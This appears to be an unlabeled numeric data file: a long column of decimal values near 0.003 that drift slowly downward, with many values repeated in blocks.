0.00300655
0.00300143
0.00300126
0.00300655
0.00300641
0.00300124
0.00303362
0.00302798
0.00303362
0.00302798
0.00301212
0.00301713
0.00301713
0.00301732
0.00301194
0.00301194
0.00300659
0.00300156
0.00300654
0.00300131
0.00300153
0.0030066
0.00300642
0.00300659
0.00300157
0.00300654
0.00300131
0.00300153
0.0030066
0.00300642
0.0030123
0.0030172
0.00301738
0.00301219
0.00301737
0.00301233
0.00301208
0.0030123
0.0030172
0.00301738
0.00301219
0.00301737
0.00301233
0.00301208
0.00300654
0.00300117
0.00300117
0.00300135
0.00300635
0.00300635
0.00300639
0.003012
0.00300639
0.003012
0.0029905
0.00298491
0.0029905
0.00298491
0.00298505
0.00297973
0.00297973
0.00298488
0.00298488
0.0029799
0.00299078
0.00299584
0.00299566
0.00299068
0.00299583
0.00299057
0.00299083
0.00299078
0.00299584
0.00299566
0.00299068
0.00299583
0.00299057
0.00299083
0.00299061
0.0029956
0.0029956
0.00299578
0.00299044
0.00299044
0.0029851
0.00297986
0.00298506
0.00298012
0.00298494
0.00298007
0.00298512
0.0029851
0.00297986
0.00298506
0.00298012
0.00298494
0.00298007
0.00298512
0.00296355
0.00296911
0.00296355
0.00296911
0.00296921
0.00297418
0.00297418
0.00297435
0.00296905
0.00296905
0.00296373
0.00295878
0.00296369
0.00295853
0.00296358
0.00296375
0.00295873
0.00296373
0.00295878
0.00296369
0.00295853
0.00296358
0.00296375
0.00295873
0.00296938
0.00297424
0.00297442
0.00296928
0.0029744
0.00296918
0.00296944
0.00296938
0.00297424
0.00297442
0.00296928
0.0029744
0.00296918
0.00296944
0.00296368
0.0029584
0.0029584
0.00296352
0.00296352
0.00295855
0.00298492
0.00298507
0.00297982
0.00297998
0.00298494
0.00298507
0.0029798
0.00299043
0.00299578
0.00299058
0.00299558
0.00299064
0.0029905
0.0029907
0.00299566
0.00299579
0.00299053
0.00299565
0.00299069
0.00298486
0.00297992
0.00298497
0.00298505
0.00297973
0.00296911
0.00297424
0.00297437
0.00296931
0.00297423
0.00296913
0.0029693
0.00296351
0.00296361
0.00295858
0.0029584
0.00296369
0.00296905
0.00297435
0.00296918
0.00297417
0.00296924
0.00296356
0.00296371
0.00295848
0.00295864
0.00295846
0.00296358
0.0029637
0.00296911
0.00297424
0.00297437
0.00296931
0.00297423
0.00296913
0.0029693
0.00296351
0.00296361
0.00295858
0.00296369
0.0029584
0.00296905
0.00297436
0.00296919
0.00297417
0.00296924
0.00296356
0.00296371
0.00295848
0.00295864
0.00296358
0.0029637
0.00295846
0.00298505
0.00297973
0.00297973
0.00298488
0.00298488
0.0029799
0.00299078
0.00299584
0.00299566
0.00299068
0.00299057
0.00299583
0.00299083
0.00299078
0.00299584
0.00299566
0.00299068
0.00299083
0.00299583
0.00299057
0.00299061
0.0029956
0.0029956
0.00299044
0.00299578
0.00299044
0.0029851
0.00297986
0.00298506
0.00298012
0.00298494
0.00298512
0.00298007
0.0029851
0.00297986
0.00298506
0.00298012
0.00298512
0.00298494
0.00298007
0.0029905
0.00298491
0.00296355
0.00296911
0.00296921
0.00297418
0.00297418
0.00297435
0.00296905
0.00296905
0.00296373
0.00295878
0.00296369
0.00295853
0.00296375
0.00296358
0.00295873
0.00296373
0.00295878
0.00296369
0.00295853
0.00296358
0.00296375
0.00295873
0.00296938
0.00297424
0.00297442
0.00296928
0.00296944
0.0029744
0.00296918
0.00296938
0.00297424
0.00297442
0.00296928
0.0029744
0.00296918
0.00296944
0.00296368
0.0029584
0.0029584
0.00296352
0.00296352
0.00295855
0.00296355
0.00296911
0.00298493
0.00298507
0.00297982
0.00297998
0.00298494
0.00298507
0.0029798
0.00299043
0.00299578
0.00299058
0.00299558
0.00299064
0.00299051
0.0029907
0.00299566
0.00299579
0.00299053
0.00299565
0.00299069
0.00298486
0.00297993
0.00298497
0.00298505
0.00297973
0.00296911
0.00297437
0.00297424
0.00296931
0.00297423
0.0029693
0.00296913
0.00296351
0.00296361
0.00295858
0.0029584
0.00296369
0.00296905
0.00297435
0.00296918
0.00297417
0.00296924
0.00296356
0.00296371
0.00295864
0.00295848
0.00295846
0.0029637
0.00296358
0.00296911
0.00297424
0.00297437
0.00296931
0.00297423
0.00296913
0.0029693
0.00296351
0.00296361
0.00295858
0.00296369
0.0029584
0.00296905
0.00297436
0.00296919
0.00297417
0.00296924
0.00296356
0.00296371
0.00295848
0.00295864
0.00296358
0.0029637
0.00295846
0.00298492
0.00298507
0.00297998
0.00297982
0.00298507
0.00298494
0.0029798
0.00299043
0.00299578
0.00299058
0.00299064
0.00299558
0.00299051
0.0029907
0.00299579
0.00299566
0.00299069
0.00299565
0.00299053
0.00298486
0.00297992
0.00298497
0.00298505
0.00297973
0.00298492
0.00298507
0.00297982
0.00297998
0.00298494
0.00298507
0.0029798
0.00299043
0.00299578
0.00299058
0.00299558
0.00299064
0.00299051
0.0029907
0.00299566
0.00299579
0.00299565
0.00299053
0.00299069
0.00298486
0.00297992
0.00298497
0.00298505
0.00297973
0.00296911
0.00297437
0.00297424
0.00296931
0.00297423
0.0029693
0.00296913
0.00296351
0.00296361
0.00295858
0.00296368
0.0029584
0.00296905
0.00297435
0.00296918
0.00297417
0.00296924
0.00296356
0.00296371
0.00295864
0.00295848
0.0029637
0.00296357
0.00295846
0.00296911
0.00297424
0.00297437
0.00296931
0.00297423
0.00296913
0.00296929
0.00296351
0.00296361
0.00295858
0.00296369
0.0029584
0.00296905
0.00297436
0.00296918
0.00297417
0.00296924
0.00296356
0.00296371
0.00295848
0.00295864
0.00296358
0.0029637
0.00295846
0.00298505
0.00297973
0.00297973
0.00298488
0.00298488
0.0029799
0.00299078
0.00299584
0.00299566
0.00299068
0.00299057
0.00299583
0.00299083
0.00299078
0.00299584
0.00299566
0.00299068
0.00299083
0.00299583
0.00299057
0.00299061
0.0029956
0.0029956
0.00299044
0.00299578
0.00299044
0.0029851
0.00297986
0.00298506
0.00298012
0.00298494
0.00298512
0.00298007
0.0029851
0.00297986
0.00298506
0.00298012
0.00298512
0.00298494
0.00298007
0.0029905
0.00298491
0.00296355
0.00296911
0.00296921
0.00297418
0.00297418
0.00297435
0.00296905
0.00296905
0.00296373
0.00295878
0.00296369
0.00295853
0.00296375
0.00296358
0.00295873
0.00296373
0.00295878
0.00296369
0.00295853
0.00296358
0.00296375
0.00295873
0.00296938
0.00297424
0.00297442
0.00296928
0.00296944
0.0029744
0.00296918
0.00296938
0.00297424
0.00297442
0.00296928
0.0029744
0.00296918
0.00296944
0.00296368
0.0029584
0.0029584
0.00296352
0.00296352
0.00295855
0.00296355
0.00296911
0.00298493
0.00298507
0.00297998
0.00297982
0.00298507
0.00298494
0.0029798
0.00299043
0.00299578
0.00299058
0.00299064
0.00299558
0.00299051
0.0029907
0.00299579
0.00299566
0.00299069
0.00299565
0.00299053
0.00298486
0.00297993
0.00298497
0.00298505
0.00297973
0.00298493
0.00298507
0.00297998
0.00297982
0.00298507
0.00298494
0.0029798
0.00299043
0.00299578
0.00299058
0.00299558
0.00299064
0.00299051
0.0029907
0.00299579
0.00299566
0.00299565
0.00299069
0.00299053
0.00298486
0.00297992
0.00298497
0.00298505
0.00297973
0.00296911
0.00297437
0.00297424
0.00296931
0.00297423
0.0029693
0.00296913
0.00296351
0.00296361
0.00295858
0.00296369
0.0029584
0.00296905
0.00297436
0.00296918
0.00297417
0.00296924
0.00296356
0.00296371
0.00295864
0.00295848
0.0029637
0.00296358
0.00295846
0.00296911
0.00297437
0.00297424
0.00296931
0.00297423
0.0029693
0.00296913
0.00296351
0.00296361
0.00295858
0.00296369
0.0029584
0.00296905
0.00297436
0.00296918
0.00297417
0.00296924
0.00296356
0.00296371
0.00295864
0.00295848
0.00296371
0.00296358
0.00295846
0.0029905
0.00298491
0.0029905
0.00298491
0.00296921
0.00297418
0.00297418
0.00297435
0.00296905
0.00296905
0.00296373
0.00295878
0.00296369
0.00295853
0.00295873
0.00296375
0.00296358
0.00296373
0.00295878
0.00296369
0.00295852
0.00295873
0.00296375
0.00296358
0.00296938
0.00297424
0.00297442
0.00296928
0.0029744
0.00296944
0.00296918
0.00296938
0.00297424
0.00297442
0.00296928
0.0029744
0.00296944
0.00296918
0.00296368
0.0029584
0.0029584
0.00295855
0.00296352
0.00296352
0.00296356
0.00296911
0.00296355
0.00296911
0.00294783
0.0029423
0.00294783
0.0029423
0.00294242
0.00293717
0.00293717
0.00294227
0.00294227
0.00293732
0.00294809
0.00295311
0.00295294
0.00294799
0.00295309
0.0029479
0.00294816
0.00294809
0.00295311
0.00295294
0.00294799
0.00295309
0.0029479
0.00294816
0.00294792
0.00295288
0.00295288
0.00295304
0.00294777
0.00294777
0.00294247
0.0029373
0.00294243
0.00293756
0.00294232
0.00293749
0.0029425
0.00294247
0.0029373
0.00294243
0.00293755
0.00294232
0.00293749
0.0029425
0.00292116
0.00292666
0.00292116
0.00292666
0.00292674
0.00293168
0.00293168
0.00293183
0.0029266
0.0029266
0.00292131
0.00291643
0.00292128
0.00291617
0.00292117
0.00292135
0.00291636
0.00292131
0.00291643
0.00292128
0.00291617
0.00292118
0.00292135
0.00291636
0.00292691
0.00293174
0.00293191
0.00292681
0.00293188
0.00292672
0.00292698
0.00292691
0.00293173
0.00293191
0.00292681
0.00293188
0.00292672
0.00292698
0.00292127
0.00291606
0.00291606
0.00292112
0.00292112
0.00291619
0.00294231
0.00294246
0.00293725
0.00293741
0.00294232
0.00294245
0.00293723
0.00294778
0.00295304
0.0029479
0.00295287
0.00294795
0.00294783
0.00294803
0.00295294
0.00295306
0.00294785
0.00295293
0.00294801
0.00294226
0.00293735
0.00294236
0.00294243
0.00293718
0.00292666
0.00293174
0.00293186
0.00292685
0.00293173
0.00292668
0.00292684
0.00292113
0.00292121
0.00291622
0.00291607
0.00292128
0.00292661
0.00293184
0.00292673
0.00293168
0.00292677
0.00292117
0.00292131
0.00291613
0.00291629
0.00291611
0.00292118
0.0029213
0.00292666
0.00293174
0.00293186
0.00292685
0.00293173
0.00292668
0.00292684
0.00292113
0.00292121
0.00291622
0.00292128
0.00291607
0.00292661
0.00293184
0.00292673
0.00293168
0.00292677
0.00292117
0.00292131
0.00291613
0.00291629
0.00292118
0.0029213
0.00291611
0.00294242
0.00293718
0.00293717
0.00294227
0.00294227
0.00293732
0.00294809
0.00295311
0.00295294
0.00294799
0.0029479
0.00295309
0.00294816
0.00294809
0.00295311
0.00295294
0.00294799
0.00294816
0.00295309
0.0029479
0.00294792
0.00295288
0.00295288
0.00294777
0.00295304
0.00294777
0.00294247
0.0029373
0.00294243
0.00293756
0.00294232
0.0029425
0.00293749
0.00294247
0.0029373
0.00294243
0.00293755
0.0029425
0.00294232
0.00293749
0.00294783
0.0029423
0.00292116
0.00292666
0.00292674
0.00293168
0.00293168
0.00293183
0.0029266
0.0029266
0.00292131
0.00291643
0.00292128
0.00291617
0.00292135
0.00292118
0.00291636
0.00292131
0.00291643
0.00292128
0.00291617
0.00292118
0.00292135
0.00291636
0.00292691
0.00293174
0.00293191
0.00292681
0.00292698
0.00293188
0.00292672
0.00292691
0.00293174
0.00293191
0.00292681
0.00293188
0.00292672
0.00292698
0.00292127
0.00291606
0.00291606
0.00292113
0.00292113
0.00291619
0.00292116
0.00292666
0.00294231
0.00294246
0.00293725
0.00293741
0.00294232
0.00294245
0.00293723
0.00294778
0.00295304
0.0029479
0.00295287
0.00294795
0.00294783
0.00294803
0.00295294
0.00295306
0.00294785
0.00295292
0.00294801
0.00294226
0.00293735
0.00294236
0.00294243
0.00293718
0.00292666
0.00293186
0.00293174
0.00292685
0.00293173
0.00292683
0.00292668
0.00292113
0.00292121
0.00291622
0.00291607
0.00292128
0.00292661
0.00293184
0.00292673
0.00293168
0.00292677
0.00292117
0.00292131
0.00291629
0.00291613
0.00291611
0.0029213
0.00292118
0.00292666
0.00293174
0.00293186
0.00292685
0.00293173
0.00292668
0.00292684
0.00292113
0.00292121
0.00291622
0.00292128
0.00291607
0.00292661
0.00293184
0.00292673
0.00293168
0.00292677
0.00292117
0.00292131
0.00291613
0.00291629
0.00292118
0.0029213
0.00291611
0.00294231
0.00294246
0.00293741
0.00293725
0.00294245
0.00294232
0.00293723
0.00294778
0.00295304
0.0029479
0.00294795
0.00295287
0.00294783
0.00294803
0.00295306
0.00295294
0.00294801
0.00295292
0.00294785
0.00294226
0.00293735
0.00294236
0.00294243
0.00293718
0.00294231
0.00294246
0.00293725
0.00293741
0.00294232
0.00294245
0.00293723
0.00294778
0.00295304
0.0029479
0.00295287
0.00294795
0.00294783
0.00294803
0.00295293
0.00295306
0.00295292
0.00294785
0.00294801
0.00294226
0.00293735
0.00294236
0.00294243
0.00293718
0.00292666
0.00293186
0.00293174
0.00292685
0.00293173
0.00292684
0.00292668
0.00292113
0.00292121
0.00291622
0.00292128
0.00291607
0.00292661
0.00293184
0.00292673
0.00293168
0.00292677
0.00292117
0.00292131
0.00291629
0.00291613
0.0029213
0.00292118
0.00291611
0.00292666
0.00293174
0.00293186
0.00292685
0.00293173
0.00292668
0.00292684
0.00292113
0.00292121
0.00291622
0.00292128
0.00291607
0.00292661
0.00293184
0.00292673
0.00293168
0.00292677
0.00292117
0.00292131
0.00291613
0.00291629
0.00292118
0.0029213
0.00291611
0.00294242
0.00293717
0.00293717
0.00294227
0.00294227
0.00293732
0.00294809
0.00295311
0.00295294
0.00294799
0.0029479
0.00295309
0.00294816
0.00294809
0.00295311
0.00295294
0.00294799
0.00294816
0.00295309
0.0029479
0.00294792
0.00295288
0.00295288
0.00294777
0.00295304
0.00294777
0.00294247
0.0029373
0.00294243
0.00293756
0.00294232
0.0029425
0.00293749
0.00294247
0.0029373
0.00294243
0.00293755
0.0029425
0.00294232
0.00293749
0.00294783
0.0029423
0.00292116
0.00292666
0.00292674
0.00293168
0.00293168
0.00293183
0.0029266
0.0029266
0.00292131
0.00291643
0.00292128
0.00291617
0.00292135
0.00292117
0.00291636
0.00292131
0.00291643
0.00292128
0.00291617
0.00292117
0.00292135
0.00291636
0.00292691
0.00293174
0.00293191
0.00292681
0.00292698
0.00293188
0.00292672
0.00292691
0.00293173
0.00293191
0.00292681
0.00293188
0.00292672
0.00292698
0.00292127
0.00291606
0.00291606
0.00292112
0.00292112
0.00291619
0.00292116
0.00292665
0.00294231
0.00294246
0.00293741
0.00293725
0.00294245
0.00294232
0.00293723
0.00294778
0.00295304
0.0029479
0.00294795
0.00295287
0.00294783
0.00294803
0.00295306
0.00295294
0.00294801
0.00295293
0.00294785
0.00294226
0.00293735
0.00294236
0.00294243
0.00293718
0.00294231
0.00294246
0.00293741
0.00293725
0.00294245
0.00294232
0.00293723
0.00294778
0.00295304
0.0029479
0.00295287
0.00294795
0.00294783
0.00294803
0.00295306
0.00295294
0.00295292
0.00294801
0.00294785
0.00294226
0.00293735
0.00294236
0.00294243
0.00293718
0.00292666
0.00293186
0.00293174
0.00292685
0.00293173
0.00292683
0.00292668
0.00292113
0.00292121
0.00291622
0.00292128
0.00291607
0.00292661
0.00293184
0.00292673
0.00293168
0.00292677
0.00292117
0.00292131
0.00291629
0.00291613
0.0029213
0.00292118
0.00291611
0.00292666
0.00293186
0.00293174
0.00292685
0.00293173
0.00292683
0.00292668
0.00292113
0.00292121
0.00291622
0.00292128
0.00291607
0.00292661
0.00293184
0.00292673
0.00293168
0.00292677
0.00292117
0.00292131
0.00291629
0.00291613
0.0029213
0.00292118
0.00291611
0.00294783
0.0029423
0.00294783
0.0029423
0.00292674
0.00293168
0.00293168
0.00293183
0.0029266
0.0029266
0.00292131
0.00291643
0.00292128
0.00291617
0.00291636
0.00292135
0.00292117
0.00292131
0.00291643
0.00292128
0.00291617
0.00291636
0.00292135
0.00292117
0.00292691
0.00293173
0.00293191
0.00292681
0.00293188
0.00292698
0.00292672
0.00292691
0.00293173
0.00293191
0.00292681
0.00293188
0.00292698
0.00292672
0.00292127
0.00291606
0.00291605
0.00291619
0.00292112
0.00292112
0.00292116
0.00292666
0.00292116
0.00292666
0.00290559
0.00290012
0.00290559
0.00290012
0.00290022
0.00289504
0.00289504
0.00290008
0.00290008
0.00289516
0.00290583
0.00291081
0.00291064
0.00290574
0.00291077
0.00290565
0.00290591
0.00290583
0.00291081
0.00291064
0.00290574
0.00291077
0.00290565
0.00290591
0.00290566
0.00291059
0.00291059
0.00291073
0.00290553
0.00290553
0.00290026
0.00289515
0.00290023
0.00289541
0.00290013
0.00289533
0.0029003
0.00290026
0.00289515
0.00290023
0.00289541
0.00290013
0.00289533
0.0029003
0.00287918
0.00288462
0.00287918
0.00288462
0.00288469
0.0028896
0.0028896
0.00288973
0.00288457
0.00288457
0.00287931
0.00287449
0.00287928
0.00287423
0.00287919
0.00287935
0.0028744
0.00287931
0.00287449
0.00287928
0.00287423
0.00287919
0.00287935
0.0028744
0.00288486
0.00288965
0.00288981
0.00288476
0.00288977
0.00288468
0.00288494
0.00288485
0.00288965
0.00288981
0.00288476
0.00288977
0.00288468
0.00288494
0.00287927
0.00287412
0.00287412
0.00287914
0.00287914
0.00287424
0.00290013
0.00290027
0.00289511
0.00289526
0.00290014
0.00290026
0.0028951
0.00290555
0.00291074
0.00290566
0.0029106
0.0029057
0.00290559
0.00290579
0.00291065
0.00291077
0.00290561
0.00291064
0.00290576
0.00290009
0.0028952
0.00290017
0.00290023
0.00289506
0.00288462
0.00288965
0.00288977
0.00288481
0.00288964
0.00288464
0.00288479
0.00287915
0.00287922
0.00287427
0.00287414
0.00287928
0.00288459
0.00288974
0.00288468
0.00288961
0.00288472
0.00287919
0.00287932
0.00287419
0.00287434
0.00287418
0.00287919
0.00287931
0.00288462
0.00288965
0.00288977
0.00288481
0.00288964
0.00288464
0.00288479
0.00287915
0.00287922
0.00287427
0.00287928
0.00287414
0.00288459
0.00288974
0.00288469
0.00288961
0.00288473
0.00287919
0.00287932
0.00287419
0.00287434
0.00287919
0.00287931
0.00287418
0.00290022
0.00289504
0.00289504
0.00290009
0.00290009
0.00289517
0.00290583
0.00291081
0.00291064
0.00290574
0.00290565
0.00291078
0.00290591
0.00290583
0.00291081
0.00291064
0.00290574
0.00290591
0.00291077
0.00290565
0.00290566
0.00291059
0.00291059
0.00290554
0.00291073
0.00290554
0.00290026
0.00289515
0.00290023
0.00289541
0.00290013
0.0029003
0.00289533
0.00290026
0.00289515
0.00290023
0.00289541
0.0029003
0.00290013
0.00289533
0.00290559
0.00290012
0.00287916
0.00288463
0.00288469
0.00288961
0.0028896
0.00288973
0.00288457
0.00288457
0.00287931
0.00287449
0.00287928
0.00287422
0.00287935
0.00287918
0.0028744
0.00287931
0.00287449
0.00287928
0.00287423
0.00287919
0.00287935
0.0028744
0.00288486
0.00288965
0.00288982
0.00288476
0.00288494
0.00288977
0.00288468
0.00288486
0.00288965
0.00288981
0.00288476
0.00288977
0.00288468
0.00288494
0.00287927
0.00287412
0.00287412
0.00287914
0.00287914
0.00287424
0.00287918
0.00288462
0.00290013
0.00290027
0.00289511
0.00289526
0.00290013
0.00290025
0.0028951
0.00290555
0.00291074
0.00290566
0.00291059
0.0029057
0.00290559
0.00290578
0.00291064
0.00291076
0.00290561
0.00291063
0.00290576
0.00290009
0.0028952
0.00290016
0.00290023
0.00289505
0.00288462
0.00288977
0.00288965
0.00288481
0.00288964
0.00288479
0.00288464
0.00287915
0.00287922
0.00287427
0.00287414
0.00287928
0.00288459
0.00288974
0.00288468
0.00288961
0.00288472
0.00287919
0.00287932
0.00287434
0.00287419
0.00287418
0.00287931
0.00287919
0.00288462
0.00288965
0.00288977
0.00288481
0.00288964
0.00288464
0.00288479
0.00287915
0.00287922
0.00287427
0.00287928
0.00287414
0.00288459
0.00288974
0.00288468
0.00288961
0.00288472
0.00287919
0.00287932
0.00287419
0.00287434
0.00287919
0.00287931
0.00287418
0.00290013
0.00290027
0.00289526
0.00289511
0.00290025
0.00290014
0.0028951
0.00290555
0.00291074
0.00290566
0.0029057
0.0029106
0.00290559
0.00290578
0.00291076
0.00291064
0.00290576
0.00291063
0.00290561
0.00290009
0.0028952
0.00290017
0.00290023
0.00289506
0.00290013
0.00290027
0.00289511
0.00289526
0.00290013
0.00290025
0.00289509
0.00290555
0.00291074
0.00290566
0.0029106
0.0029057
0.00290559
0.00290578
0.00291064
0.00291076
0.00291063
0.00290561
0.00290576
0.00290009
0.0028952
0.00290016
0.00290023
0.00289505
0.00288462
0.00288977
0.00288965
0.00288481
0.00288964
0.00288479
0.00288464
0.00287915
0.00287922
0.00287427
0.00287928
0.00287414
0.00288459
0.00288974
0.00288468
0.00288961
0.00288472
0.00287919
0.00287932
0.00287434
0.00287419
0.00287931
0.00287919
0.00287418
0.00288462
0.00288965
0.00288977
0.00288481
0.00288964
0.00288464
0.00288479
0.00287915
0.00287922
0.00287427
0.00287928
0.00287414
0.00288459
0.00288974
0.00288468
0.00288961
0.00288472
0.00287919
0.00287932
0.00287419
0.00287434
0.00287919
0.00287931
0.00287418
0.00290022
0.00289504
0.00289504
0.00290008
0.00290008
0.00289516
0.00290583
0.00291081
0.00291064
0.00290574
0.00290565
0.00291077
0.00290591
0.00290583
0.00291081
0.00291064
0.00290574
0.00290591
0.00291077
0.00290565
0.00290566
0.00291059
0.00291059
0.00290553
0.00291073
0.00290553
0.00290026
0.00289515
0.00290023
0.00289541
0.00290013
0.0029003
0.00289533
0.00290026
0.00289515
0.00290023
0.00289541
0.0029003
0.00290013
0.00289533
0.00290559
0.00290012
0.00287918
0.00288462
0.00288469
0.0028896
0.0028896
0.00288973
0.00288457
0.00288457
0.00287931
0.00287449
0.00287928
0.00287423
0.00287935
0.00287919
0.0028744
0.00287931
0.00287449
0.00287928
0.00287423
0.00287919
0.00287935
0.0028744
0.00288485
0.00288965
0.00288981
0.00288476
0.00288494
0.00288977
0.00288468
0.00288485
0.00288965
0.00288981
0.00288476
0.00288977
0.00288468
0.00288494
0.00287927
0.00287412
0.00287412
0.00287914
0.00287914
0.00287424
0.00287917
0.00288462
0.00290013
0.00290027
0.00289526
0.00289511
0.00290025
0.00290013
0.00289509
0.00290555
0.00291074
0.00290566
0.0029057
0.00291059
0.00290559
0.00290578
0.00291076
0.00291064
0.00290576
0.00291063
0.00290561
0.00290009
0.0028952
0.00290016
0.00290023
0.00289505
0.00290013
0.00290027
0.00289526
0.00289511
0.00290025
0.00290013
0.00289509
0.00290555
0.00291074
0.00290565
0.00291059
0.0029057
0.00290559
0.00290578
0.00291076
0.00291064
0.00291063
0.00290576
0.00290561
0.00290009
0.0028952
0.00290016
0.00290023
0.00289505
0.00288462
0.00288977
0.00288965
0.00288481
0.00288964
0.00288479
0.00288464
0.00287915
0.00287922
0.00287427
0.00287928
0.00287414
0.00288459
0.00288974
0.00288468
0.00288961
0.00288472
0.00287919
0.00287932
0.00287434
0.00287419
0.00287931
0.00287919
0.00287418
0.00288462
0.00288977
0.00288965
0.00288481
0.00288964
0.00288479
0.00288464
0.00287915
0.00287922
0.00287427
0.00287928
0.00287414
0.00288458
0.00288974
0.00288468
0.00288961
0.00288472
0.00287919
0.00287932
0.00287434
0.00287419
0.00287931
0.00287919
0.00287418
0.00290559
0.00290012
0.00290559
0.00290012
0.00288469
0.0028896
0.0028896
0.00288973
0.00288457
0.00288457
0.00287931
0.00287449
0.00287928
0.00287423
0.0028744
0.00287935
0.00287919
0.00287931
0.00287449
0.00287928
0.00287423
0.0028744
0.00287935
0.00287919
0.00288485
0.00288964
0.00288981
0.00288476
0.00288977
0.00288494
0.00288468
0.00288485
0.00288964
0.00288981
0.00288476
0.00288977
0.00288494
0.00288468
0.00287927
0.00287412
0.00287412
0.00287424
0.00287914
0.00287914
0.00287917
0.00288462
0.00287917
0.00288462
0.00286375
0.00285833
0.00286375
0.00285833
0.00285842
0.0028533
0.0028533
0.0028583
0.0028583
0.00285341
0.00286398
0.00286891
0.00286875
0.00286388
0.00286887
0.0028638
0.00286406
0.00286398
0.00286891
0.00286875
0.00286388
0.00286887
0.0028638
0.00286406
0.00286381
0.00286871
0.00286871
0.00286883
0.0028637
0.0028637
0.00285845
0.0028534
0.00285843
0.00285366
0.00285834
0.00285357
0.0028585
0.00285845
0.0028534
0.00285843
0.00285366
0.00285834
0.00285357
0.0028585
0.00283758
0.00284298
0.00283758
0.00284298
0.00284303
0.00284792
0.00284792
0.00284803
0.00284293
0.00284293
0.0028377
0.00283293
0.00283768
0.00283267
0.00283759
0.00283774
0.00283283
0.0028377
0.00283293
0.00283768
0.00283267
0.00283759
0.00283774
0.00283283
0.00284319
0.00284795
0.00284811
0.0028431
0.00284806
0.00284303
0.00284328
0.00284319
0.00284795
0.00284811
0.0028431
0.00284806
0.00284303
0.00284328
0.00283767
0.00283257
0.00283257
0.00283755
0.00283755
0.00283268
0.00285834
0.00285848
0.00285337
0.00285351
0.00285835
0.00285846
0.00285335
0.00286372
0.00286884
0.00286381
0.00286872
0.00286385
0.00286375
0.00286394
0.00286876
0.00286887
0.00286377
0.00286875
0.00286391
0.00285831
0.00285345
0.00285837
0.00285843
0.00285332
0.00284298
0.00284796
0.00284807
0.00284316
0.00284796
0.00284299
0.00284314
0.00283757
0.00283762
0.00283271
0.0028326
0.00283768
0.00284295
0.00284804
0.00284303
0.00284793
0.00284307
0.00283759
0.00283773
0.00283264
0.00283278
0.00283263
0.0028376
0.0028377
0.00284298
0.00284796
0.00284807
0.00284316
0.00284796
0.00284299
0.00284314
0.00283757
0.00283762
0.00283271
0.00283768
0.0028326
0.00284295
0.00284804
0.00284303
0.00284793
0.00284307
0.00283759
0.00283773
0.00283264
0.00283278
0.0028376
0.0028377
0.00283263
0.00285842
0.0028533
0.0028533
0.0028583
0.0028583
0.00285341
0.00286397
0.00286891
0.00286875
0.00286388
0.0028638
0.00286887
0.00286406
0.00286397
0.00286891
0.00286875
0.00286388
0.00286406
0.00286887
0.0028638
0.00286381
0.00286871
0.00286871
0.0028637
0.00286883
0.0028637
0.00285845
0.0028534
0.00285843
0.00285366
0.00285834
0.0028585
0.00285357
0.00285845
0.0028534
0.00285843
0.00285366
0.0028585
0.00285834
0.00285357
0.00286375
0.00285833
0.00283758
0.00284298
0.00284303
0.00284791
0.00284791
0.00284803
0.00284292
0.00284293
0.0028377
0.00283293
0.00283768
0.00283267
0.00283774
0.00283759
0.00283283
0.0028377
0.00283293
0.00283768
0.00283267
0.00283759
0.00283774
0.00283283
0.00284319
0.00284795
0.00284811
0.0028431
0.00284328
0.00284806
0.00284302
0.00284319
0.00284795
0.00284811
0.0028431
0.00284806
0.00284303
0.00284328
0.00283767
0.00283257
0.00283257
0.00283755
0.00283755
0.00283268
0.00283758
0.00284297
0.00285834
0.00285848
0.00285337
0.00285351
0.00285835
0.00285846
0.00285336
0.00286372
0.00286884
0.00286381
0.00286872
0.00286385
0.00286375
0.00286394
0.00286876
0.00286887
0.00286377
0.00286875
0.00286391
0.00285831
0.00285345
0.00285837
0.00285843
0.00285332
0.00284298
0.00284807
0.00284796
0.00284316
0.00284796
0.00284313
0.00284299
0.00283757
0.00283762
0.00283271
0.0028326
0.00283768
0.00284295
0.00284804
0.00284303
0.00284793
0.00284307
0.00283759
0.00283772
0.00283278
0.00283264
0.00283263
0.0028377
0.0028376
0.00284298
0.00284796
0.00284807
0.00284316
0.00284796
0.00284299
0.00284314
0.00283757
0.00283762
0.00283271
0.00283768
0.0028326
0.00284295
0.00284804
0.00284303
0.00284793
0.00284307
0.00283759
0.00283773
0.00283264
0.00283278
0.0028376
0.0028377
0.00283263
0.00285834
0.00285848
0.00285351
0.00285337
0.00285846
0.00285835
0.00285335
0.00286372
0.00286884
0.00286381
0.00286385
0.00286872
0.00286375
0.00286394
0.00286887
0.00286876
0.00286391
0.00286875
0.00286377
0.00285831
0.00285345
0.00285837
0.00285843
0.00285332
0.00285834
0.00285848
0.00285337
0.00285351
0.00285835
0.00285846
0.00285335
0.00286372
0.00286884
0.00286381
0.00286872
0.00286385
0.00286375
0.00286394
0.00286876
0.00286887
0.00286875
0.00286377
0.00286391
0.00285831
0.00285345
0.00285837
0.00285843
0.00285332
0.00284298
0.00284807
0.00284796
0.00284316
0.00284796
0.00284314
0.00284299
0.00283757
0.00283762
0.00283271
0.00283768
0.0028326
0.00284295
0.00284804
0.00284303
0.00284793
0.00284307
0.00283759
0.00283772
0.00283278
0.00283264
0.0028377
0.0028376
0.00283263
0.00284298
0.00284796
0.00284807
0.00284316
0.00284796
0.00284299
0.00284313
0.00283757
0.00283762
0.00283271
0.00283768
0.0028326
0.00284295
0.00284804
0.00284303
0.00284793
0.00284307
0.00283759
0.00283772
0.00283264
0.00283278
0.0028376
0.0028377
0.00283263
0.00285842
0.0028533
0.0028533
0.0028583
0.0028583
0.00285341
0.00286397
0.00286891
0.00286875
0.00286388
0.0028638
0.00286887
0.00286406
0.00286397
0.00286891
0.00286875
0.00286388
0.00286406
0.00286887
0.0028638
0.00286381
0.00286871
0.00286871
0.0028637
0.00286883
0.0028637
0.00285845
0.0028534
0.00285843
0.00285366
0.00285834
0.0028585
0.00285357
0.00285845
0.0028534
0.00285843
0.00285366
0.0028585
0.00285834
0.00285357
0.00286375
0.00285833
0.00283758
0.00284298
0.00284303
0.00284791
0.00284791
0.00284803
0.00284293
0.00284293
0.00283769
0.00283293
0.00283768
0.00283267
0.00283774
0.00283759
0.00283283
0.00283769
0.00283293
0.00283768
0.00283267
0.00283759
0.00283774
0.00283283
0.00284319
0.00284795
0.00284811
0.0028431
0.00284328
0.00284806
0.00284303
0.00284319
0.00284795
0.00284811
0.0028431
0.00284806
0.00284303
0.00284328
0.00283767
0.00283257
0.00283257
0.00283755
0.00283755
0.00283268
0.00283758
0.00284297
0.00285834
0.00285848
0.00285351
0.00285337
0.00285846
0.00285835
0.00285335
0.00286372
0.00286884
0.00286381
0.00286385
0.00286872
0.00286375
0.00286394
